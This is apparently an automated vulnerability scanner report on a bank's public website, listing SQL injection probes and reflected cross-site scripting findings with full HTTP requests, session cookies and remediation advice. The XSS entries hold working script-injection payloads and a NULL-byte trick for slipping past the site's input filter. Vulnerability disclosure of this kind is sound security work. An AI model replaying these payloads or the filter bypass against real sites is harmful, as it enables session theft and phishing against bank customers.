HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:45 GMT location: http://www.bbt.com/bbt/%27%27/personal/products/onlinebanking/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 173 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/personal/products/onlinebanking/default.html">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/personal'/products/onlinebanking/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:55 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/personal''/products/onlinebanking/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:55 GMT location: http://www.bbt.com/bbt/personal%27%27/products/onlinebanking/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 172 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal%27%27/products/onlinebanking/default.html">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/personal/products'/onlinebanking/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:01 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/personal/products''/onlinebanking/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:01 GMT location: http://www.bbt.com/bbt/personal/products%27%27/onlinebanking/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 172 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal/products%27%27/onlinebanking/default.html">here</a>.</body>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/personal/products/onlinebanking'/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:09 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/personal/products/onlinebanking''/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:09 GMT location: http://www.bbt.com/bbt/personal/products/onlinebanking%27%27/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 172 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal/products/onlinebanking%27%27/default.html">here</a>.</body>
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/personal/products/onlinebanking/default.html' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:14 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/personal/products/onlinebanking/default.html'' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:14 GMT location: http://www.bbt.com/bbt/personal/products/onlinebanking/default.html%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 172 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal/products/onlinebanking/default.html%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/sitemap.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:19 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/sitemap.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:19 GMT location: http://www.bbt.com/bbt/%27%27/sitemap.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 141 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/sitemap.html">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/sitemap.html' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:40 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/sitemap.html'' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:40 GMT location: http://www.bbt.com/bbt/sitemap.html%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 140 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/sitemap.html%27%27">here</a>.</body>
2. Cross-site scripting (reflected)previousnext There are 13 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://www.bbt.com/bbt/Business/Products/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/Business/Products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5e39"><script>alert(1)</script>409e4716c9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5e39"><script>alert(1)</script>409e4716c9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/Business/Products/?%00f5e39"><script>alert(1)</script>409e4716c9d=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:13 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 53268 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
2.2. http://www.bbt.com/bbt/Personal/Products/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/Personal/Products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0069b54"><script>alert(1)</script>e1573406ba9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b54"><script>alert(1)</script>e1573406ba9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/Personal/Products/?%0069b54"><script>alert(1)</script>e1573406ba9=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:49 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 40557 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
2.3. http://www.bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/about/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002a618"><script>alert(1)</script>b69e85cef55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a618"><script>alert(1)</script>b69e85cef55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/about/?%002a618"><script>alert(1)</script>b69e85cef55=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:46 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 27477 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> < ...[SNIP]... <a href="/bbt/about/default.html?page=print&%002a618"><script>alert(1)</script>b69e85cef55=1" onClick="NewWindow(this.href,'product','650','500','yes');return false;"> ...[SNIP]...
2.4. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a93d"><script>alert(1)</script>a2f88c48136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a93d"><script>alert(1)</script>a2f88c48136 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/about/privacyandsecurity/completeclientprotection/default.html?%007a93d"><script>alert(1)</script>a2f88c48136=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:35 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30854 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
2.5. http://www.bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/careers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0012a7a"><script>alert(1)</script>5fb5315ccee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12a7a"><script>alert(1)</script>5fb5315ccee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/careers/?%0012a7a"><script>alert(1)</script>5fb5315ccee=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:51 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 33957 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
2.6. http://www.bbt.com/bbt/mobile/mobile-product.html [name of an arbitrarily supplied request parameter]previousnext
